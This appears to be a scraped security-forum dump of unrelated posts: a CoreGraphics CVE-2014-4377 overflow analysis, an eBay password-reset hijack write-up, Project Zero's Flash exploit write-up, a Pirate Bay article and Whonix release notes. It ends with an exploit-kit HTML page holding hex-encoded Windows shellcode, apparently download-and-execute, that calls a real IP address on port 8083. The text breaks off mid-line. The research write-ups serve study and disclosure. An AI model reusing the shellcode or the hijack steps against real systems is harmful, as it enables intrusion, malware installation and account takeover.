Sanity check, array must have 4 elements */ if ( CGPDFArrayGetCount(cs_index_array) != 4 ) { message = "invalid `Indexed' color space: incorrect number of entries in color space array."; goto EXIT; } /* Sanity check, 2nd element should be an object */ if ( !CGPDFArrayGetObject(cs_index_array, 1, &base_cs_obj) ) { message = "invalid `Indexed' color space: second color space array entry is not an object."; goto EXIT; } /* build the base colorspace */ base_cs = cg_build_colorspace(base_cs_obj); if ( !base_cs ) { message = "invalid `Indexed' color space: invalid base color space."; goto EXIT; } /* get the 3rd element. N, the number of indexed colors in the table */ if ( CGPDFArrayGetInteger(cs_index_array, 2, &N) ) { message = "invalid `Indexed' color space: high value entry is not an integer."; goto RELEASE_EXIT; } /* Sanity check. N should be positive */ if ( N <= -1 ) { message = "invalid `Indexed' color space: high value entry is negative."; goto RELEASE_EXIT; } /* cs is the resultant colorspace, init to NULL */ cs = 0; /* if 4th element is a pdf stream get it and do stuff ...*/ if ( CGPDFArrayGetStream(cs_index_array, 3, &lookup_stream) == 1 ) { lookup_buffer = CGPDFStreamCopyData(lookup_stream); if ( lookup_buffer ) { lookup_size = (N + 1) * CGColorSpaceGetNumberOfComponents(base_cs); if ( CFDataGetLength(lookup_buffer) >= lookup_size ) { data = CFDataGetBytePtr(lookup_buffer); cs = CGColorSpaceCreateIndexed(base_cs, N_, data); } else { /* HERE is te interesting bit. A lookup_size in the [-16,-1] range will silently allocate a very small buffer */ overflow_buffer = x_calloc_2D5143B4(1, lookup_size); _data = CFDataGetBytePtr(lookup_buffer); _size = CFDataGetLength(lookup_buffer); /* But memove will copy all the available data in the stream OVERFLOW!! */ memmove(overflow_buffer, _data, _size); /* CGColorSpaceCreateIndexed is a nop when N is greater than 256 */ cs = CGColorSpaceCreateIndexed(base_cs, N_, overflow_buffer); if ( overflow_buffer ) x_free(overflow_buffer); } CFRelease(lookup_buffer); } goto RELEASEANDEXIT; } /* else if 4th element is a pdf string get it and do stuff ...*/ if ( CGPDFArrayGetString(cs_index_array, 3, &lookup_str) == 1 ) { lookup_size_ = (N + 1) * CGColorSpaceGetNumberOfComponents(base_cs); if ( lookup_size_ != CGPDFStringGetLength(lookup_str) ) { message = "invalid `Indexed' color space: invalid lookup entry."; goto RELEASEANDEXIT; } buffer = CGPDFStringGetBytePtr(lookup_str); cs = CGColorSpaceCreateIndexed(base_cs, N__, buffer); goto RELEASEANDEXIT; } /* at thispoint cs is NULL */ message = "invalid `Indexed' color space: lookup entry is not a stream or a string."; RELEASE_EXIT: CGColorSpaceRelease(base_cs); EXIT: log_2D5A0DA8(message); /* result in cs */ CGPDFArrayGetInteger gets an object from an arbitrary position in a pdf array, starting at 0. The number of indexed colors is read from the third array position (index 2), multiplied by the number of color components of the base colorspace and then (if using pdf stream) allocated with a x_calloc. We basically control the size passed to x_calloc. If the resultant value is for instance -10, x_calloc will allocate a small amount of memory and return a valid pointer. If the innner colorspace is /DeviceRGB with 3 color components, passing a value of 0x55555555 will do the trick. Then the memmove will potentially overflow the small buffer with an arbitrary number of arbitrary bytes. The function CGColorSpaceCreateIndexed can be considered as a no-op as it will use this buffer only if our controlled size is a positive less than 0xff, not the interesting case. Exploitation A 100% reliable PoC exploit can be downloaded from the github project. This exploit needs a companion information leakage vulnerability to bypass ASLR, DEP and Code signing iOS exploit mitigations. The exploit is presented as a cgi script that expects to get the dyld_shared_cache address, the shellcode address and the iOS version as GET parameters. It executes arbitrary code in the context of SafariMobile. Exploit: https://github.com/feliam/CVE-2014-4377 Blog post: Binamuse Blog: CoreGraphics Memory Corruption - CVE-2014-4377 Info: iOS 7_1 exploit for CVE-2014-4377 flaw publicly available | Security Affairs
-
Today I am going to share an interesting finding that allowed me to change the password of almost “150 million” eBay users! I was checking my e-mail when I have found a “View your recent activity” message from PayPal, I have checked the links inside the message and found an “Open Redirection” vulnerability! I have decided to report it to Paypal, I asked a friend of mine about the Paypal security e-mail, he told me that I should register on eBay to report Vulnerabilities to Paypal . Well, I went to eBay to register and have found two other vulnerabilities while registering!, I have reported the three bugs and waited. Two days later, I tried to log in my eBay account to check the status of my 3 reports, and like every time, I have forgotten my password . I went to ” Forget Password” page at eBay to see how secure their password reset mechanism is. So here is how users can change their own passwords on eBay: 1- The user navigate ” Forget password page ” and enter his registered Email or Username. 2- eBay gives you the three options which you can change your password with (Using Email, Text message or phone call). 3- If you use Email method, they will send you an email includes a reset password link where you can change your own password. So lets fire up BurpSuite to see what happens behind the scene.. Visting (https://fyp.ebay.com/EnterUserInfo?&clientapptype=19) and entering my e-mail address will take me to another page that asks me where I want to get my “Reset Password Link” , I have chosen ” By E-mail” and intercepted the request Hijacking eBay users After Forwarding that request, I received an Email with a change password link, I clicked on the link, it takes me to another page where I have to create my new password, I have entered my new password, hit enter and intercepted the request which looked like: Hijacking eBay users Have you noticed that??!! Wow, instead of using the Secret “reqinput value” that have been sent to the user’s email, eBay uses the same “reqinput” value that have been generated in the first request!!! Exploitation Time: I went again to the ” Forget Password page” then entered the victim email, then chose to send the “Reset Password link” to e-mail and captured the request and save the “reqinput value” . then I repeated the POST request “shown in the last screen shot” and replaced the reqinput value with the new one, I posted it, but it gave me error!! Why? because the user have to “click” on the link sent to the email to the server can unlock the change password process ” and this is the only user interaction that has to be taken in order to make the attack succeed” after the user clicked on the “reset password” link, I was able to change his password This means that an attacker can hijack millions of user accounts in a targeted attack Here is a real life attack scenario diagram: eBay hacked Enjoy watching the POC video Sursa: Yasser Ali's Blog » How I could change your eBay password
-
Breaking the Sandbox Author: Sudeep Singh Introduction In this paper, I would like to discuss various existing and interesting techniques which are used to evade the detection of a virus in Sandbox. We will also look at ways a sandbox can be hardened to prevent such evasion techniques. This paper is targeted towards those who have an experience with Windows OS internals, reverse engineering viruses as well as those who are interested in developing detection mechanisms for viruses in a Sandboxed environment. A deep understanding of the evasion techniques used by viruses in the wild helps us in implementing better detection mechanisms. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/34591.pdf
-
[h=1]The Pirate Bay Runs on 21 "Raid-Proof" Virtual Machines To Avoids Detection[/h] Tuesday, September 23, 2014 Mohit Kumar The Pirate Bay is the world's largest torrent tracker site which handles requests from millions of users everyday and is in the top 100 most visited websites on the Internet. Generally, The Pirate Bay is famous for potentially hosting illegal contents on its website. Despite years of persecution, it continues to disobey copyright laws worldwide. Even both the founders of The Pirate Bay (TPB) file exchange service were arrested by the authorities and are in prison, but their notorious pirated content exchange continues to receive millions of unique visitors daily. That’s really Strange!! But how?? Recently, The Pirate Bay team has revealed how cloud technology made its service’s virtual servers truly secure to avoid police raids and detection. While it doesn't own any physical servers, The Pirate Bay is working on “virtual machines” through a few commercial cloud hosting services, even without knowing that whom they are dealing with. According to TorrentFreak report, at present The Pirate Bay has 21 virtual machines (VMs) that are hosted around the globe at different cloud provider. The cloud technology eliminate the use of any crucial pieces of hardware, thus saved cost, guaranteed better uptime, and made the site more portable, and therefore made the torrent harder to take down. The Pirate Bay operates using 182 GB of RAM and 94 GPU cores, with total storage capacity of 620 GB, which actually are not used in full. Out of 21 VMs, eight of the VMs are used to serve web pages, six are dedicated to handling searches, while two VMs currently runs the site’s database and the remaining five virtual machines are used for load balancing, statistics, the proxy site on port 80, torrent storage and for the controller. Interestingly, the commercial cloud hosting providers have no ideas that The Pirate Bay is using their services, because all traffic goes through the load balancer, which masks the activities of other virtual machines from the cloud providers. This clearly means that none of the IP-addresses of the cloud hosting providers are publicly linked to The Pirate Bay, so that should keep them safe. While, in case of closure of some of these cloud servers by the police, it is always possible to move VMs to another location in a relatively short duration of time. Just like when back in 2006 in Sweden, police raided The Pirate Bay's hosting company, seizing everything from blank CDs to fax machines and servers, taking down the site. But, it took just three days to return in its normal state. Sursa: The Pirate Bay Runs on 21 "Raid-Proof" Virtual Machines To Avoids Detection
-
Exploiting CVE-2014-0556 in Flash Posted by Chris Evans, Kidnapper of RIP A couple of weeks ago, Adobe released security bulletin APSB14-21, including 8 fixes for bugs reported by Project Zero. Full details of these bugs are now public in our bug tracker. Some of the more interesting ones are a double free in the RTMP protocol, or an integer overflow concatenating strings. Again, we’d like to thank Adobe for a response time well ahead of our standard 90-day disclosure deadline. The focus of this post is an integer overflow leading to a buffer overflow in an ActionScript API. Prelude Before we get started, though, it’s worth briefly noting why there is so much value in writing an exploit. Finding and eliminating bugs obviously improves software correctness, but writing exploits is always a significant learning opportunity. Throughout the history of the security industry, there’s a long track record of offense driving defense, leading to technologies such as stack canaries, NX support in processors and ASLR. Project Zero is not just a bug hunting initiative. We’re doing our part to continue the tradition of practical and public research of exploitation techniques -- and deriving defenses from them. For example, our glibc defensive patch was accepted as a follow-on from our glibc exploit. The case of this particular exploit starts with some irony on account of my overly hasty initial triage of the bug based on instincts which were later proved wrong by a more in-depth analysis of exploitation opportunities. In the bug history, you can see the claim “almost certainly 64-bit only” (wrong!) and then “does not work in Chrome 64-bit Linux”. We learned not to declare anything as unexploitable in our previous post about exploiting a subtle condition in glibc. Therefore, I had to declare shenanigans on myself and tackle the challenge: exploit this bug on Chrome 64-bit Linux. The bug The bug is triggered by calling BitmapData.copyPixelsToByteArray() with a reference to a ByteArray that has its position property set very large -- close to 2^32. This results in an integer overflow in 32-bit arithmetic. This occurs even on 64-bit because the relevant positions and length variables are (quite reasonably) stored in 32-bit variables. The code then believes that it can copy the pixels, starting to write them at position, and stay within the bounds of the buffer. Instead, a buffer overflow occurs. On 32-bit, the out-of-bounds write will be written before the start of the buffer because the pointer will wrap. On 64-bit, things are not as kind to the attacker. On a typical 64-bit Linux process setup with a 1MB buffer, the situation will look like this: … | buffer: 1MB | heap, libs, binary | !! The out-of-bounds write (in red) is at approximately buffer + 4GB. This will not wrap around the massive 64-bit address space, leading to a write way off in unmapped space. Insta-crash. The most obvious way to avoid the crash is to make the buffer massive, almost 4GB, leading to this situation: … | buffer: 4GB | !! heap, libs, binary | This is readily exploitable. However, 64-bit Chrome on Linux has a defensive measure where the amount of mapped address space is limited to 4GB. So the large buffer allocation will fail and prevent that particular attack. The heap groom We’re going to need a trick to exploit this without slamming into the 4GB address space limit. The breakthrough -- that did not occur to me before attempting to develop an exploit -- comes when we realize that we don’t need to have the address space contiguously mapped. The out-of-bounds write will happily still go ahead even if it “jumps over” a hole in the address space. By having a hole in the address space, perhaps we can usefully trigger the corruption with less than 4GB mapped. But how do we put this hole where we want it? Looking at how the Flash allocator works using the strace system tool, we see that very large allocations are serviced using unhinted mmap(). The Linux standard algorithm for servicing unhinted mmap() calls is to stack them adjacent and downwards in address space, as long as there isn’t a hole that can satisfy the request. So let’s see what happens when we allocate two 1GB chunks: … | buffer2: 1GB | buffer1: 1GB | heap, libs, binary | And the free the first one (a direct munmap() call is seen): … | buffer2: 1GB | 1GB hole | heap, libs, binary | And then allocate a 2GB buffer (too big to fit in the hole): … | buffer3: 2GB | buffer2: 1GB | 1GB hole | !! heap, libs, binary | Aha! We’ve managed to engineer a situation where we’ve never had more than 4GB of address space mapped at any given moment, and at the end, a corruption at buffer3 + 4GB will land right in a writable region: the heap. The corruption target Now that we have a reasonably controlled memory corruption situation, we need to pick something to corrupt. As is pretty standard in modern heap buffer overflow exploitation in a scripting environment, we’re going to try and clobber a length of an array-like object. If we clobber any such length to be larger, we will then be able to read and write arbitrary relative heap memory. Once we’ve achieved such a powerful primitive, it’s essentially game over. Successful exploitation is pretty much assured: defeat ASLR by reading the value of a vtable and then write a new vtable that causes execution redirection to a sequence of opcodes that we choose. We decide to corrupt a Vector.<uint> buffer object. This is a fairly standard, documented technique. I recommend Haifei Li’s excellent paper as background reading. Corrupting this buffer object is an obvious target because of three properties it possesses: The attacker can choose arbitrary sizes for these objects, meaning there is a lot of control over where in the heap they are placed relative to the pending heap corruption. The object starts with a length field, and corrupting it results in arbitrary heap relative read/write being exposed to script. The object is resilient to corruption in general. Aside from the length field, there is just a single pointer and trashing this pointer does not affect the ability to use the Vector, or otherwise cause noticeable stability issues during the course of exploitation. (We could even restore its value post-exploitation if we wished.) To proceed, we simply create many (32) Vector.<uint> objects, all with buffers sized at about 2MB. These typically end up being stacked downwards at the top of the 1GB hole. In reality, the 1GB and 2GB allocations end up being a little larger than expected under the covers. This means that the corruption address of buffer3 + 4GB actually ends up corrupting objects within the 1GB hole instead of after it. This is ideal because we can make sure that only our large buffers are corrupted. In terms of the actual data to write, we just use the default values in an empty BitmapData, which are 0xffffffff (white pixels with a full alpha channel). 0xffffffff is a plenty large enough length to proceed with the exploit! Proceeding onwards There is nothing particularly exciting or unique about how the exploit proceeds to demonstrate code execution, so we’ll skip the lengthy explanation here. I’ve made an attempt to fully comment the exploit source code, so if you want to continue to follow along I recommend you read the materials attached to the public bug. The only part I’d flag as mildly interesting -- because it differs from the previously quoted paper -- is how we get known data at a known heap address. We do it with a Vector.<uint> object again. Each of these is in fact a pair of objects: a script object, which is a fixed sized and contains metadata; and the buffer object which contains the arbitrary data prefixed by the length. The script object forms a distinct pattern in memory and also contains a pointer to the buffer object. By locating anyVector.<uint> script object, we can then use a raw memory edit to change a property of the object. This property change will be visible to ActionScript so we then know which handle corresponds to a buffer at which raw address. Conclusions, and turning what we’ve learned into generic defenses Various technologies would have changed the exploitation landscape here, and can now be investigated in more detail: Randomized placement of large memory chunks. Non-deterministic placement of large allocations would have broken the heap grooming aspect of the exploit. Isolation of Vector.<uint> buffers. As we’ve seen, corruption of these buffers is an extremely dangerous condition. Some of the most recent advances in memory corruption defenses have been “isolated” or “partitioned” heaps. These technologies seem applicable here. (They would need to be applied not just to the Vector buffers, but to the general case: partitioning off read/write objects where the attacker controls both the size and the content.) Given the open-source nature of the ActionScript engine, and the open-source nature of some potentially helpful technologies, a prototype of a generic defense is now on the Project Zero TODO list! Sursa: Project Zero: Exploiting CVE-2014-0556 in Flash
-
Whonix Anonymous Operating System Version 9 Released! Posted on September 19, 2014 by Patrick Schleizer Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP. Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible. Download Whonix for VirtualBox https://www.whonix.org/wiki/Download Download Whonix for KVM / QEMU / Qubes This is only useful if you have a testers mindset! Instructions for KVM: https://www.whonix.org/wiki/KVM Instructions for QEMU: https://www.whonix.org/wiki/QEMU Instructions for Qubes: https://www.whonix.org/wiki/Qubes Call for Help – If you know shell scripting (/bin/bash) and linux sysadmin, please join us! There are plenty of ways to make Whonix safer. – We are also looking for download mirros. – For https://www.whonix.org we need some help with css, html, mediawiki, wordpress, webdesign. – Contribute: https://www.whonix.org/wiki/Contribute – Donate: https://www.whonix.org/wiki/Donate If you want to upgrade existing Whonix version using Whonix’s APT repository Upgrading Whonix 8 to Whonix 9 – You cannot upgrade using apt-get dist-upgrade or you will break the packaging system! – You can upgrade using these instructions: https://www.whonix.org/wiki/Upgrading_Whonix_8_to_Whonix_9 If you want to upgrade existing Whonix version from source code See https://www.whonix.org/wiki/Dev/BuildDocumentation. If you want to build images from source code See https://www.whonix.org/wiki/Dev/BuildDocumentation. Physical Isolation users See https://www.whonix.org/wiki/Dev/Build_Documentation/Physical_Isolation. Changelog between Whonix 8 and Whonix 9 – Modding Whonix, extending Whonix, such as installi ng a different desktop environment is now much simpler, because Whonix has been split into smaller packages https://github.com/Whonix/Whonix/issues/40. Therefore also understanding Whonix internals got simpler. – added testers-only libvirt (kvm, qemu) support – providing xz archives with sparse .qcow2 images – added experimental Qubes support – A new feature for VPN lovers has been added. VPN’s can now also be easily installed on Whonix-Gateway. Previously, many VPN users who wanted to route Tor through a VPN (user -> VPN -> Tor), preferred to install VPNs on the host and had little different choice. Some in conjunction with VPN-Firewall, to avoid connecting without the VPN, if the VPN (software) breaks down. Physical isolation users could not easily use a VPN on Whonix-Gateway and naturally had no host. VPN-Firewall features have been added to Whonix-Gateway’s firewall in. network-manager-kde and OpenVPN is now being installed by default to aid users who want to hide Tor and Whonix from their ISP. – Lots of AppArmor profiles are now installed from Whonix’s APT Repository, thanks to troubadoour for creating them! – fixed Tor restart bug when updated by apt-get – updated Debian packages including Heartbleed OpenSSL bug fix – VirtualBox version: no longer recommending to use VirtualBox’s snapshot feature in VirtualBox’s VM import text due to data loss bug in VirtualBox – Breaking change: Changed Whonix-Gateway internal IP address to 10.152.152.10 and netmask to 255.255.192.0 to avoid conflicts, such as with real networks when using physical isolation and to aid KVM users. – Breaking change: Changed Whonix-Workstation internal IP address to 10.152.152.11, netmask to 255.255.192.0 and gateway to 10.152.152.10 to avoid conflicts, such as with real networks when using physical isolation and to aid KVM users. – use logrotate for bootclockrandomization, sdwdate, control-port-filter, timesanitycheck – fixed timezone question during upgrade for Whonix build version 9 and above – encrypt swapfile on boot with random password, create swap file on boot using init script instead of postinst script (package: swap-file-creator) – Whonix-Gateway firewall: reject invalid outgoing packages – added spice-vdagent to anon-shared-packages-recommended for better kvm support – ram adjusted desktop starter (package: rads): fixed lightdm (/usr/sbin/…) auto detection – Physical Isolation: automated ‘Install Basic Packages’ (‘sudo apt-get install $(grep -vE “^\s*#” grml_packages | tr “\n” ” “)’) build step – Changed keyserver (suggested by tempest @ https://www.whonix.org/forum/index.php/topic,140.0.html) from hkp://2eghzlv2wwcq7u7y.onion to hkp://qdigse2yzvuglcix.onion as used by torbirdy and https://raw.github.com/ioerror/torbirdy/master/gpg.conf. – Whonix-Gateway: Re-enabled AppArmor for System Tor. Removed workaround for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=732578 (USE_AA_EXEC=”no”) by removing Whonix’s displaced (config-package-dev) /etc/default/tor since that bug has been fixed upstream. – bootclockrandomization: randomizing milliseconds (anonymous, unlink from the host) – Whonix-Workstation: added password manager fpm2 as per https://www.whonix.org/forum/index.php/topic,187.15.html – removed –onion feature from update-torbrowser and its man page because torproject took its .onion domain permanently offline (https://trac.torproject.org/projects/tor/ticket/11567) thanks got z (https://www.whonix.org/forum/index.php?action=profile;u=94) for the report (https://www.whonix.org/forum/index.php/topic,277.msg1827.html#msg1827) – help_check_tor_bootstrap.py: – suggestions by Damian Johnson from — https://lists.torproject.org/pipermail/tor-dev/2014-May/006799.html — https://lists.torproject.org/pipermail/tor-dev/2014-May/006804.html – troubadour advised on implementation https://www.whonix.org/forum/index.php/topic,278.0 – controller.authenticate(“password”) isn’t required, controller.authenticate() works – more robust method to parse Tor bootstrap percent – removed obsolete whonix_gateway/usr/bin/armwrapper (user “user” is now member of group “debian-tor”, so no longer required to start arm as user “debian-tor”) – removed backgroundd, was replaced by gateway first run notice https://www.whonix.org/forum/index.php?topic=207 – added machine readable copyright files – better output, better formatting, clickable links, thanks to https://github.com/troubadoour for working on msgcollector – kde-kgpg-tweaks: added gnupg-agent to dependencies because we’re using it in the config and because otherwise kgpg would complain about using use-agent while having no agent installed – Refined whonixlock.png. Thanks to nanohard (https://www.whonix.org/forum/index.php?action=profile;u=248) for the edit! – added apt-transport-https to anon-shared-packages-dependencies – added openvpn to anon-shared-packages-recommended – added network-manager-kde to anon-shared-desktop-kde – changed displace extension from .apparmor to .anondist, thanks to [config-package-dev] How to configure displace extension? – control-port-filter: Added “lie feature”, i.e. when getting asked “GETINFO net/listeners/socks” answer ‘250-net/listeners/socks=”127.0.0.1:9150?‘; configurable by CONTROL_PORT_FILTER_LIMIT_GETINFO_NET_LISTENERS_SOCKS variable. Enabled by default. – control-port-filter: Limit maximum accepted command string length to 128 (configurable) as done by Tails (https://mailman.boum.org/pipermail/tails-dev/2014-February/005041.html). Thanks to HulaHoop (https://www.whonix.org/forum/index.php?action=profile;u=87) for suggesting this (https://www.whonix.org/forum/index.php/topic,342.0.html). – control-port-filter: added GETINFO status/circuit-established to whitelist – control-port-filter: replaced netcat-traditional dependency with netcat-openbsd as per https://www.whonix.org/forum/index.php/topic,444.0.html – sdwdate: implemented options –no-move-forward and –no-move-backwards (disabled by default) – sdwdate implemented option to update hardware clock –systohc (disabled by default) – sdwdate: no more clock jumps. Gradually adjust clock as NTP does. Sclockadj has been written by Jason Ayala (Jason@JasonAyala.com) (@JasonJAyalaP) – https://github.com/Whonix/Whonix/issues/169 – Sclockadj helps sdwdate gradually adjusting the clock instead of producing clock jumps, which can confuse Tor, i2p, servers, logs and more. – It can add/subtract any amount of nanoseconds. – It supports waiting an interval of min/max nanoseconds between iterations, which will be randomized if min/max differs. – It supports slewing the time for min/max nanoseconds, which will be randomized if min/max differs. – It supports to wait before its first iteration. – It can run either verbose or quite. – It supports either really changing the time or running in debug mode. – sdwdate: use median instead of average as suggested in https://www.whonix.org/forum/index.php/topic,267.0.html – whonixcheck: don’t check just if Tor is fully bootstrapped, also check if Tor was actually able to create a circuit. – whonixcheck: increased Tor socks port reachability test timeout from 5 to 10 as per https://www.whonix.org/forum/index.php/topic,129.0.html – whonixcheck: fixed apt-get –simulate parsing code, whonixcheck can now also report how many packages could be upgraded when using non-English languages – whonixcheck: There is no general “Whonix Debian Version” anymore, because Whonix has been split into multiple packages that now all have their own version number. What whonixcheck can figure out is if the whonixcheck version is up to date and if there is a Whonix news file for that whonixcheck version. There is currently no notification for packages by the Whonix team in whonixcheck for packages other than whonixcheck for users who do not use Whonix’s APT repository. – whonixcheck: check_virtualizer, no longer warn if Qubes (https://www.whonix.org/wiki/Qubes) is detected; improved output, improved html tags – anon-shared-build-apt-sources-tpo: updated The Tor Project’s apt signing key as per https://trac.torproject.org/projects/tor/ticket/12994#comment:9 – whonixcheck: refactoring, use /usr/lib/msgcollector/striphtml rather than sed in usr/lib/whonixcheck/check_tor_socks_or_trans_port – added VPN_FIREWALL feature to Whonix-Gateway’s firewall https://www.whonix.org/blog/testers-wanted-vpn-firewall – https://www.whonix.org/wiki/Next#Tunnel_Tor_through_VPN – Whonix-Firewall: make variables overwrite able by /etc/whonix_firewall.d config folder – Whonix-Firewall: renamed variable NON_TOR_WHONIXG to NON_TOR_GATEWAY – added empty Whonix-Custom-Workstation – Added extra log file /var/run/tor/log that won’t survive reboot. (Existing log file /var/log/tor/log that survives reboot will continue to exist.) And added necessary AppArmor rules. Thanks to @troubadoour who figured out the AppArmor rules (https://www.whonix.org/forum/index.php/topic,372.0/topicseen.html). This is useful, so whonixcheck can in future grep the log for clock specific warnings (https://github.com/Whonix/Whonix/issues/244). – sdwdate: log time/date before and after running sclockadj – swap-file-creator: timeout when reading from /dev/random – when whonixsetup is automatically started, support automatically maximizing window in other terminals than konsole – disable TCP-Timestamps (implemented #247) – New alternative option name –install-to-root. This is an alternative to –bare-metal. Since some users liked to use “–bare-metal in a VM”, which sounds like an oxymoron. Now we can talk about “using –install-to-root in a VM”. – Drop all incoming ICMP traffic by default. All incoming connections are dropped by default anyway, but should a user allow incoming ports (such as for incoming SSH or FlashProxy), ICMP should still be dropped to filter for example ICMP time stamp requests. – Removed geoclue-ubuntu-geoip and geoclue from anon-banned-packages because those are not evil by definition, those are only providing an API. Not allowing them to be installed would not allow users installing gnome-desktop-environment. – vbox-disable-timesync: added compatibility with Debian jessie – whonix-gw-firewall: Added 10.0.2.2/24 to NON_TOR_GATEWAY and LOCAL_NET to prevent spamming syslog with: host dhclient: DHCPREQUEST on eth0 to 10.0.2.2 port 67 | host dhclient: send_packet: Operation not permitted – rads: made compatible with systemd / debian testing by adding tty1 autologin drop-in config – tb-updater: update tbb version url as per https://trac.torproject.org/projects/tor/ticket/8940#comment:21 – tb-updater: compatibility with new recommended tbb versions format as per https://trac.torproject.org/projects/tor/ticket/8940#comment:28 – tb-updater: Whonix’s Tor Browser updater: download from torproject’s clearnet domain instead of torproject’s onion domain by default, because the onion domain is too slow/can’t handle the load. Downloading form the onion domain is possible using –onion. – tb-updater: break when endless data attack is detected (max file size 100 mb for torbrowser, 1 mb for other files) – anon-ws-disable-stacked-tor: Set environment variable “export TOR_SKIP_CONTROLPORTTEST=1? to skip TorButton control port verification as per https://trac.torproject.org/projects/tor/ticket/13079. Will take effect as soon as The Tor Project merges the TOR_SKIP_CONTROLPORTTEST patch. – sdwdate: curl, use –head rather than –include as per https://github.com/Whonix/Whonix/issues/315 – sdwdate: Breaking change: pool variable names were renamed. SDWDATE_POOL_PAL, SDWDATE_POOL_NEUTRAL, are now called SDWDATE_POOL_ONE, SDWDATE_POOL_TWO, SDWDATE_POOL_THREE. If you were using custom pools, you should update your config according to the new variable names. As per https://github.com/Whonix/Whonix/issues/310. – sdwdate: no longer using pal/neutral/foe pool design. Using three pools instead, that only contain servers of the type “pal”. As per https://github.com/Whonix/Whonix/issues/310. Thanks to https://github.com/HulaHoopWhonix for suggesting it. – uwt: all temporary files are now in /tmp/uwt – anon-base-files /usr/lib/pre.bsh: all temporary files are now in /tmp/prepost – whonixcheck / sdwdate / timesync / tb-updater / whonix-repository / control-port-filter: fix, clean up temporary files/directory – whonixcheck / timesync / update-torbrowser: correct exit codes on signal sigterm and sigint – whonixcheck / timesync: output – whonix-gw-kde-desktop-conf: no longer use custom wallpaper (mountain mist) for Whonix-Gateway. Only use wallpapers from Debian repository for security reasons. (https://github.com/Whonix/Whonix/issues/318) Will now default to KDE’s default wallpaper. (Thanks to https://github.com/HulaHoopWhonix for suggesting it) – build script: Added deletion of /boot/grub/device.map for VM builds during build process to prevent hard drive serial of build machine leaking into image. System also boots without /boot/grub/device.map. https://github.com/Whonix/Whonix/issues/249 – build script: verifiable builds: now using fixed disk identifiers to make verification easier – build script: updated frozen repository – build script: improved error handling, when error is detected, wait until builder presses enter before cleanup and exit to make it simpler to read error messages when building in cli – build script: whonix_build now acts differently for –clean option depending on –virtualbox, –qcow2 and –bare-metal – build script: removed Whonix’s grml-debootstrap fork, because Whonix’s patches were merged upstream – build script: Renamed “img” to “raw”, because “img” was a poor name for raw images. – build script: made variables overrideable by build config – build script: set DEBUILD_LINTIAN_OPTS to “–info –display-info –show-overrides –fail-on-warnings”, to show more verbose lintian output and to break the build should lintian find an error such as a syntax error in a bash script – build script: Workaround for a bug in kpartx, which fails to delete the loop device when using very long file names as per https://www.redhat.com/archives/dm-devel/2014-July/msg00053.html – build script: implemented –testing-frozen-sources, installs from Debian testing frozen (snapshot.debian.org) sources. This is useful for compatibility test of Whonix’s Debian packages with Debian testing. There is no official support for Debian testing. – build script: Use SAS rather than SATA as virtual hard disk controller for VirtualBox hdds to work around a VirtualBox upstream bug that causes filesystem corruption on high disk I/O (https://www.virtualbox.org/ticket/10031). Thanks to @neurodrive for the bug report (https://github.com/Whonix/Whonix/issues/274). – whonix-repository tool, anon-shared-build-apt-sources-tpo, anon-apt-sources-list: use wheezy rather than stable as per https://www.whonix.org/forum/index.php/topic,445.msg3640.html – build script: makefile: added new feature “make deb-chl-bumpup” – Bump upstream version number in debian/changelog. – build script: added support for –vram, –vmram, –vmsize switches – build script: added –file-system (var: whonix_build_file_system) – build script: added –hostname (var: whonix_build_hostname) – build script: added –os-password (var: whonix_build_os_password) – build script: added –debopt (var: whonix_build_debopt) Sursa: https://www.whonix.org/blog/whonix-anonymous-9-released
-
*** @PhysicalDrive0 *** 2 <html> 3 <head> 4 <script type="text/javascript" src="pluginDet.js"></script> 5 <style type="text/css"> 6 html, body { height: 100%; overflow: auto; } 7 body { padding: 0; margin: 0; } 8 #form1 { height: 99%; } 9 #silverlightControlHost { text-align:center; } 10 </style> 11 <meta http-equiv="X-UA-Compatible" content="IE=edge" /> 12 </head> 13 <body> 14 </body> 15 <script> 16 var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000 8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3"; 17 var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351 5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358"; 18 19 var payload3 = 